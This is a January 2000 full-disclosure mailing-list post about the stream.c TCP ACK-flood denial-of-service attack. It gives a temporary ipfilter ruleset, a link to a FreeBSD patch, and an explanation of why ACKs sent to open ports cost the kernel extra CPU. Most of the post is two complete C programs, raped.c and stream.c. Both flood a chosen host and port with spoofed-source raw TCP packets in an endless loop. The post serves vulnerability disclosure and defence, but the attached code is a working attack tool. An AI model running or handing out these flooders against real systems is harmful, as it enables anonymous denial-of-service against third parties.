Date: Fri, 21 Jan 2000 11:25:26 -0600 To: news@technotronic.com, bugtraq@securityfocus.com, freebsd-security@FreeBSD.org From: Tim Yardley Subject: explanation and code for stream.c issues Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed stream.c issues --------------------------------------------------- :: temp remedy (exec summary) --------------------------------------------------- If you use ipfilter... -- start rule set -- block in quick proto tcp from any to any head 100 pass in quick proto tcp from any to any flags S keep state group 100 pass in all -- end rule set -- That will help you "stop" the attack, although it will still use some CPU though Note: If you use IPFW, there is no immediate way to solve this problem due to the fact that it is a stateless firewall. If you are getting attacked, then temporarily use ipfilter to stop it. Otherwise, wait for vendor patches. FreeBSD "unofficial patch" by Alfred Perlstein: http://www.freebsd.org/~alfred/tcp_fix.diff ------------------------------------------------ :: explanation of stream.c attack ------------------------------------------------ It mearly floods the host with ack's coming from random ips with random sequence numbers. This in itself is not too much of a problem, but rate limiting should be done to conteract its effect (the same idea as ICMP_BANDLIM). The attacker specifies the port that they want to send the acks to, depending on what ports are selected, you will have different net results. If the port is an open port, then you will have a longer kernel path to follow before the drop (at least in freebsd). Therefore, the smart attacker will hit open ports. Now, speaking specifically in terms of fbsd... this involves /sys/netinet/tcp_input.c In there, it will do a hash lookup on each and every packet in the function in_pcblookup_hash(). The wildcard bit was set by default, which would cause it to do 2 hash lookups per call, the reasoning is for connected syns (ie, recieving a syn during a connected stream already or for open ports) Since the attackers ack was recieved on something that was not already connected... fbsd will drop the packet. The problem is how they go about doing so. The same holds true for all other os's that I tested on. Again, in fbsd, the hash call returns a null pointer if it doesnt have a corresponding syn then if it isnt past the icmp_bandlim it drops with reset otherwise it just drops. The problem is.. if the attacker hits a port that is listening then one of the hash lookups will succeed and that means that the packet will not be immediately dropped, it will be processed a little first. Later in the code, if ((tiflags & (TH_RST|TH_ACK|TH_SYN)) != TH_SYN) { that line will cause the ACK attack packet to be dropped after some processing because it is not a syn packet (it will drop the packet with a RST). In the meantime, it ate up cpu cycles (checksums were calculated, hash lookups, and some other misc things) Overall it doesnt take much cpu time per packet... but it does take a lot of cpu time compared to a null pointer being returned on the hash lookup so, when you bombard a host with enough of these ack packets... it uses too much CPU and that causes the machine to either exhaust its resources, panic, lag horribly, and possibly crash in the end. In the best case scenario, you will experience only the lag of the flood and the lag of the processing (currently) and then be fine when the attacker stops, In the worst case, you reboot. Once you patch it, you deal with a lot less processing time (the drops are handled without the RST flag when appropriate -- bandlim type idea). In other words, you go to the drop routine instead of dropwithrst silencing your response, which decreases your processing time, the hit on your network, and the effect of the flood (once a threshold is reached, all those bad packets are silently dropped and the attack has less of a net effect). ----------------------- :: conclusion ----------------------- Since this is not as big of a deal as what it was made out to be and "fixes" exist, I am posting this explanation and code. I am not the finder of the "problem" or the author of stream.c, but full disclosure is a nice thing to see. -------------------- :: references -------------------- This was done independantly, although some of the analysis and reverse engineering of concept was done by other people. As a result, I would like to give credit where credit is due. The following people contributed in some way or another: Brett Glass Alfred Perlstein Warner Losh Darren Reed Also, I would like to send shouts out to w00w00 (http://www.w00w00.org/) ------------------- :: attached ------------------- There are two things attached, one is stream.c.. the other is raped.c. I threw together raped.c in about 30 minutes or so for the independant testing. A while after I was done testing, I was given a copy of stream.c. It seems as if they both have effects... but they are not substantial in my opinion (except in odd cases that I couldn't quite explain). These programs are for the sake of full disclosure, don't abuse them. -- start raped.c -- /* * raped.c by Liquid Steel [lst @ efnet -- yardley@uiuc.edu] * src: this is the old hose.c by prym, modified to suit my purposes * exploits: the stream.c "problem", not.. i did not have the stream.c source when this was written * this is just a reverse engineer based on discussion and tcp patches released. * compile: this is a 5 minute hack, and a 30 minute test prog, treat it as such * side note, this is obviously only for linux due to the header format. */ #include #include #include #include #include #include #include #include int ports, s, i; char *dsthost; unsigned long dst; unsigned long portarray[255]; void abort (void) { printf (":: exiting...\n\n"); close (s); exit (0); } void banner (void) { printf ("-------------------\n"); printf ("::\n"); printf (":: raped.c by lst\n"); printf ("::\n"); printf ("-------------------\n"); } void usage (char *progname) { printf ("usage: %s \n", progname); printf ("\t - destination host\n"); printf ("\t - ports to flood\n\n"); exit (1); } void parse_args (int argc, char *argv[]) { dsthost = argv[1]; for (i = 2; i < argc; i++) { ports++; portarray[ports] = atoi (argv[i]); } } unsigned long resolve_host (char *h) { struct hostent *host; if ((host = gethostbyname (h)) == NULL) { printf (":: unknown host %s\n", h); exit (1); } return *(unsigned long *) host->h_addr; } /* stolen from ping.c */ unsigned short in_cksum (u_short * addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; while (nleft > 1) { sum += *w++; nleft -= 2; } if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } sum = (sum >> 16) + (sum & 0xffff); sum += (sum >> 16); answer = ~sum; return (answer); } void send_tcp_segment (struct iphdr *ip, struct tcphdr *tcp, char *data, int dlen) { char buf[65536]; struct { unsigned long saddr; unsigned long daddr; char mbz; char proto; unsigned short tcplength; } ph; struct sockaddr_in sin; ph.saddr = ip->saddr; ph.daddr = ip->daddr; ph.mbz = 0; ph.proto = IPPROTO_TCP; ph.tcplength = htons (sizeof (*tcp) + dlen); memcpy (buf, &ph, sizeof (ph)); memcpy (buf + sizeof (ph), tcp, sizeof (*tcp)); memcpy (buf + sizeof (ph) + sizeof (*tcp), data, dlen); memset (buf + sizeof (ph) + sizeof (*tcp) + dlen, 0, 4); tcp->check = in_cksum ((u_short *) buf, (sizeof (ph) + sizeof (*tcp) + dlen + 1) & ~1); memcpy (buf, ip, 4 * ip->ihl); memcpy (buf + 4 * ip->ihl, tcp, sizeof (*tcp)); memcpy (buf + 4 * ip->ihl + sizeof (*tcp), data, dlen); memset (buf + 4 * ip->ihl + sizeof (*tcp) + dlen, 0, 4); ip->check = in_cksum ((u_short *) buf, (4 * ip->ihl + sizeof (*tcp) + dlen + 1) & ~1); memcpy (buf, ip, 4 * ip->ihl); sin.sin_family = AF_INET; sin.sin_port = tcp->dest; sin.sin_addr.s_addr = ip->daddr; if (sendto (s, buf, 4 * ip->ihl + sizeof (*tcp) + dlen, 0, &sin, sizeof (sin)) < 0) { perror (":: error: sending syn packet"); exit (1); } } int main (int argc, char *argv[]) { struct iphdr ip; struct tcphdr tcp; struct timeval tv; struct sockaddr_in sin; int blah = 1; signal (SIGINT, (void (*)()) abort); banner (); if (argc < 3) usage (argv[0]); parse_args (argc, argv); dst = resolve_host (dsthost); srand (time (NULL)); printf (":: destination host - %s\n", dsthost); printf (":: destination port(s)"); for (i = 1; i < ports + 1; i++) printf (" - %d", portarray[i]); printf ("\n"); if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror (":: error: can not open socket"); exit (1); } if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, (char *) &blah, sizeof (blah)) < 0) { perror (":: setsockopt"); exit (1); } ip.version = 4; ip.ihl = 5; ip.tos = 0x8; ip.frag_off = 0; ip.ttl = 255; ip.protocol = IPPROTO_TCP; ip.check = 0; ip.daddr = dst; tcp.res1 = 0; tcp.fin = 0; tcp.syn = 0; tcp.rst = 0; tcp.psh = 0; /* make it an ACK packet */ tcp.ack = 1; tcp.urg = 0; tcp.res2 = 0; tcp.urg_ptr = 0; printf (":: raping...\n"); printf (":: press ^C to end...\n"); for (;;) { for (i = 1; i < ports + 1; i++) { ip.saddr = rand (); ip.tot_len = sizeof (ip) + sizeof (tcp); ip.id = htons (random ()); tcp.source = htons (1024 + rand () % 32000); tcp.dest = htons (portarray[i]); /* randomize seq */ tcp.seq = random (); tcp.doff = sizeof (tcp) / 4; tcp.window = htons (16384); /* randomize ack */ tcp.ack_seq = random (); send_tcp_segment (&ip, &tcp, "", 0); } } return 1; } -- end raped.c -- -- start stream.c -- #include #include #include #include #include #include #include #ifndef __USE_BSD #define __USE_BSD #endif #ifndef __FAVOR_BSD #define __FAVOR_BSD #endif #include #include #include #include #include #include #ifdef LINUX #define FIX(x) htons(x) #else #define FIX(x) (x) #endif struct ip_hdr { u_int ip_hl:4, /* header length in 32 bit words */ ip_v:4; /* ip version */ u_char ip_tos; /* type of service */ u_short ip_len; /* total packet length */ u_short ip_id; /* identification */ u_short ip_off; /* fragment offset */ u_char ip_ttl; /* time to live */ u_char ip_p; /* protocol */ u_short ip_sum; /* ip checksum */ u_long saddr, daddr; /* source and dest address */ }; struct tcp_hdr { u_short th_sport; /* source port */ u_short th_dport; /* destination port */ u_long th_seq; /* sequence number */ u_long th_ack; /* acknowledgement number */ u_int th_x2:4, /* unused */ th_off:4; /* data offset */ u_char th_flags; /* flags field */ u_short th_win; /* window size */ u_short th_sum; /* tcp checksum */ u_short th_urp; /* urgent pointer */ }; struct tcpopt_hdr { u_char type; /* type */ u_char len; /* length */ u_short value; /* value */ }; struct pseudo_hdr { /* See RFC 793 Pseudo Header */ u_long saddr, daddr; /* source and dest address */ u_char mbz, ptcl; /* zero and protocol */ u_short tcpl; /* tcp length */ }; struct packet { struct ip/*_hdr*/ ip; struct tcphdr tcp; /* struct tcpopt_hdr opt; */ }; struct cksum { struct pseudo_hdr pseudo; struct tcphdr tcp; }; struct packet packet; struct cksum cksum; struct sockaddr_in s_in; u_short dstport, pktsize, pps; u_long dstaddr; int sock; void usage(char *progname) { fprintf(stderr, "Usage: %s \n", progname); fprintf(stderr, " dstaddr - the target we are trying to attack.\n"); fprintf(stderr, " dstport - the port of the target, 0 = random.\n"); fprintf(stderr, " pktsize - the extra size to use. 0 = normal syn.\n"); exit(1); } /* This is a reference internet checksum implimentation, not very fast */ inline u_short in_cksum(u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *)(&answer) = *(u_char *) w; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return(answer); } u_long lookup(char *hostname) { struct hostent *hp; if ((hp = gethostbyname(hostname)) == NULL) { fprintf(stderr, "Could not resolve %s.\n", hostname); exit(1); } return *(u_long *)hp->h_addr; } void flooder(void) { struct timespec ts; int i; memset(&packet, 0, sizeof(packet)); ts.tv_sec = 0; ts.tv_nsec = 10; packet.ip.ip_hl = 5; packet.ip.ip_v = 4; packet.ip.ip_p = IPPROTO_TCP; packet.ip.ip_tos = 0x08; packet.ip.ip_id = rand(); packet.ip.ip_len = FIX(sizeof(packet)); packet.ip.ip_off = 0; /* IP_DF? */ packet.ip.ip_ttl = 255; packet.ip.ip_dst.s_addr = dstaddr; packet.tcp.th_flags = 0; packet.tcp.th_win = htons(16384); packet.tcp.th_seq = random(); packet.tcp.th_ack = 0; packet.tcp.th_off = 5; /* 5 */ packet.tcp.th_urp = 0; packet.tcp.th_sport = rand(); packet.tcp.th_dport = dstport?htons(dstport):rand(); /* packet.opt.type = 0x02; packet.opt.len = 0x04; packet.opt.value = htons(1460); */ cksum.pseudo.daddr = dstaddr; cksum.pseudo.mbz = 0; cksum.pseudo.ptcl = IPPROTO_TCP; cksum.pseudo.tcpl = htons(sizeof(struct tcphdr)); s_in.sin_family = AF_INET; s_in.sin_addr.s_addr = dstaddr; s_in.sin_port = packet.tcp.th_dport; for(i=0;;++i) { cksum.pseudo.saddr = packet.ip.ip_src.s_addr = random(); ++packet.ip.ip_id; ++packet.tcp.th_sport; ++packet.tcp.th_seq; if (!dstport) s_in.sin_port = packet.tcp.th_dport = rand(); packet.ip.ip_sum = 0; packet.tcp.th_sum = 0; cksum.tcp = packet.tcp; packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20); packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum)); if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) perror("jess"); } } int main(int argc, char *argv[]) { int on = 1; printf("stream.c v1.0 - TCP Packet Storm\n"); if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(1); } setgid(getgid()); setuid(getuid()); if (argc < 4) usage(argv[0]); if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0) { perror("setsockopt"); exit(1); } srand((time(NULL) ^ getpid()) + getppid()); printf("\nResolving IPs..."); fflush(stdout); dstaddr = lookup(argv[1]); dstport = atoi(argv[2]); pktsize = atoi(argv[3]); printf("Sending..."); fflush(stdout); flooder(); return 0; } -- end stream.c -- /tmy -- Diving into infinity my consciousness expands in inverse proportion to my distance from singularity +-------- ------- ------ ----- ---- --- -- ------ --------+ | Tim Yardley (yardley@uiuc.edu) | http://www.students.uiuc.edu/~yardley/ +-------- ------- ------ ----- ---- --- -- ------ --------+